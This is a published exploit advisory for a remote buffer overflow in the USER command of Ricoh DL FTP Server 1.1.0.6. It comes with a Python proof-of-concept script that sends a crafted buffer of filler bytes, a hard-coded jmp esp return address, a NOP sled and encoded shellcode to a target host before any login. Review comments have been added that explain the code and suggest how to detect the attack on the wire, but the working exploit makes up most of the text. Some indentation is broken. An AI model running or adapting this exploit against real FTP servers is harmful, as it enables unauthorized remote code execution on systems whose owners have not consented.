Ricoh FTP Server versions 1.1.0.6 and below suffer from a remote buffer overflow vulnerability.
2e40b7ec94f5efc5004ef8320c004fcdad799161fdd49a36a373c9ef742e67e0
'''
Information
--------------------
Name : Ricoh FTP Server <= v1.1.0.6
Software : Ricoh DL-1 SR10.exe
Vendor Homepage : http://www.ricohpmmc.com/
Vulnerability Type : Remote Buffer Overflow
Severity : High
Researcher : Juan Sacco (Runlvl) <jsacco [at] exploitpack [dot] com>
Description
------------------
Ricoh DL FTP Server is prone to a remote buffer-overflow vulnerability
because it fails to perform adequate boundary-checks on user-supplied
data.
Successful exploitation of this bug could potentially allow an attacker
to execute
arbitrary code within the context of the affected application. Failed
exploit attempts could result in a denial-of-service condition.
Exploit example as follows
-----------------------------
Basic structure: JUNK + JMPIP + NOPS + SHELLCODE
Vulnerable command: USER
!/usr/bin/python
Based on the work of Julien Ahrens:
https://www.exploit-db.com/exploits/18643/
'''
import os
import socket
import sys
def howtousage():
    """Print the expected command-line arguments and exit with status -1."""
    usage_text = "Sorry, expecting arguments: host port"
    print(usage_text)
    sys.exit(-1)
# Proof-of-concept sender for the USER-command overflow described in the header.
# Takes no arguments and returns nothing; it reads the module-level names Host
# and Port that the __main__ block assigns from the command line.
def run():
try:
# Opaque encoded payload bytes. What they do once executed cannot be determined
# from this listing -- NOTE(review): treat the payload's behaviour as unverified.
shell = "\xba\xc9\xd2\x95\xec\xda\xd8\xd9\x74\x24\xf4\x5b\x33"
shell += "\xc9\xb1\x44\x83\xc3\x04\x31\x53\x0f\x03\x53\xc6\x30"
shell += "\x60\x10\x30\x36\x8b\xe9\xc0\x57\x05\x0c\xf1\x57\x71"
shell += "\x44\xa1\x67\xf1\x08\x4d\x03\x57\xb9\xc6\x61\x70\xce"
shell += "\x6f\xcf\xa6\xe1\x70\x7c\x9a\x60\xf2\x7f\xcf\x42\xcb"
shell += "\x4f\x02\x82\x0c\xad\xef\xd6\xc5\xb9\x42\xc7\x62\xf7"
shell += "\x5e\x6c\x38\x19\xe7\x91\x88\x18\xc6\x07\x83\x42\xc8"
shell += "\xa6\x40\xff\x41\xb1\x85\x3a\x1b\x4a\x7d\xb0\x9a\x9a"
shell += "\x4c\x39\x30\xe3\x61\xc8\x48\x23\x45\x33\x3f\x5d\xb6"
shell += "\xce\x38\x9a\xc5\x14\xcc\x39\x6d\xde\x76\xe6\x8c\x33"
shell += "\xe0\x6d\x82\xf8\x66\x29\x86\xff\xab\x41\xb2\x74\x4a"
shell += "\x86\x33\xce\x69\x02\x18\x94\x10\x13\xc4\x7b\x2c\x43"
shell += "\xa7\x24\x88\x0f\x45\x30\xa1\x4d\x03\xc7\x37\xe8\x61"
shell += "\xc7\x47\xf3\xd5\xa0\x76\x78\xba\xb7\x86\xab\xff\x48"
shell += "\xcd\xf6\xa9\xc0\x88\x62\xe8\x8c\x2a\x59\x2e\xa9\xa8"
shell += "\x68\xce\x4e\xb0\x18\xcb\x0b\x76\xf0\xa1\x04\x13\xf6"
shell += "\x16\x24\x36\x95\xf5\xbe\x97\x3f\x7d\x5a\xc8\x90\x1e"
shell += "\x84\x66\x8a\x94\xe4\x03\x27\x31\x97\xcb\xb5\xd0\x34"
shell += "\x63\x52\x02\xe9\x12\xc1\x2d\x65\xd4\x34\x81\x43\x36"
shell += "\x18\xa0\xef\x72\x46\x04\xd6\x5a\xe8\x2d\x62\xbb\x98"
shell += "\xc2\xe9\xda\x0c\x7b\x9c\x73\xb8\xf3\x40\xcd\x26\x9e"
shell += "\xe9\xa3\xcf\x13\x9e\x49\x71\xa7\x31\xdc\x02\x67\xbc"
shell += "\x49\x86\x08\x28\xaa\x67\x97\xec\xee\x77"
# NOTE(review): the two credential comments below are never used by this code.
# Only a USER line is sent and no PASS follows, so the overflow is reached
# before authentication; exposure does not depend on an attacker having an account.
# User: ricoh
# Pass: Ricoh1106
# 245 filler bytes; in the header's layout (JUNK + JMPIP + NOPS + SHELLCODE)
# this is the JUNK element that precedes the 4-byte JMPIP value.
junk = "\x61" * 245
# Hard-coded 4-byte address that the original comment ties to one specific
# USER32.DLL build (Windows Server 2003 Standard Edition SP2 English), so the
# PoC as written is specific to that OS build. The line after it is the
# wrapped tail of the same comment.
jmp = "\x38\x07\xD2\x77" # jmp esp from user32.dll # Windows Server
2003 Standard Edition SP2 English USER32.DLL jmp esp 0x77D20738 G DV UV
nops = "\x90" * 16
# Final USER argument, assembled in the order given in the header.
buffer = junk + jmp + nops + shell
s1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s1.connect((Host, int(Port)))
# Reads up to 1024 bytes and discards them (presumably the server greeting).
s1.recv(1024)
# One USER command whose argument is several hundred bytes long and contains
# non-printable bytes. For detection: a USER argument far longer than any real
# account name, or carrying non-ASCII bytes, is what this request looks like
# on the wire.
s1.send('USER ' + buffer + '\r\n')
s1.close()
# Printed whenever send() and close() return; it does not confirm that the
# server was actually affected.
print "Exploit executed successfully"
# Bare except: every failure (refused connection, unset Host/Port, bad port
# value) yields the same message, so this output is not evidence that a
# server is patched.
except:
print "Target not vulnerable or connection closed"
if __name__ == '__main__':
    # Banner first, then the two positional arguments: host and port.
    print("Ricoh DC FTP Server <= v1.1.0.6 Remote Buffer Overflow")
    print("Author: Juan Sacco")
    # Both arguments are required; howtousage() exits the process when
    # either one is missing.
    if len(sys.argv) < 3:
        howtousage()
    # Host and Port stay module-level names because run() reads them.
    Host, Port = sys.argv[1], sys.argv[2]
    run()